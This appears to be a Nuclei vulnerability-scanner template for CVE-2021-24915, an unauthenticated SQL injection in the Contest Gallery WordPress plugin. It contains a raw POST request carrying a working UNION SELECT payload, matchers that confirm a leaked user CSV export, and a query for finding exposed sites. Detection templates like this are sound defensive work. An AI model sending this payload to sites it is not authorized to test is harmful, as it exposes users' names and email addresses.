nuclei-templates/http/cves/2021/CVE-2021-24915.yaml

60 lines
2.4 KiB
YAML
Raw Normal View History

2023-10-17 07:20:28 +00:00
id: CVE-2021-24915
info:
name: Contest Gallery < 13.1.0.6 - SQL injection
author: r3Y3r53
severity: critical
description: |
The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address.
remediation: Fixed in version 13.1.0.6
reference:
- https://wpscan.com/vulnerability/45ee86a7-1497-4c81-98b8-9a8e5b3d4fac
- https://gist.github.com/tpmiller87/6c05596fe27dd6f69f1aaba4cbb9c917
- https://wordpress.org/plugins/contest-gallery/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24915
cwe-id: CWE-89
epss-score: 0.22351
epss-percentile: 0.96057
cpe: cpe:2.3:a:contest_gallery:contest_gallery:*:*:*:*:*:wordpress:*:*
2023-10-17 07:20:28 +00:00
metadata:
verified: true
max-request: 1
vendor: contest_gallery
product: contest_gallery
framework: wordpress
2024-03-27 21:41:40 +00:00
publicwww-query: "/wp-content/plugins/contest-gallery/"
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery,sqli
2023-10-17 07:20:28 +00:00
http:
- raw:
- |
POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'WpUserId'
- 'Username'
- 'Usermail'
condition: and
- type: word
part: header
words:
- 'text/csv'
- 'filename='
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220029f49c1e9fa65765eaed8f0325876a75a3da15cad0b9597a1e000f69de3c11f0221008d79ba2600b7e68952c628b0a919d453f58c97dfbc68070006af2ede9825963b:922c64590222798bb761d5b6d8e72950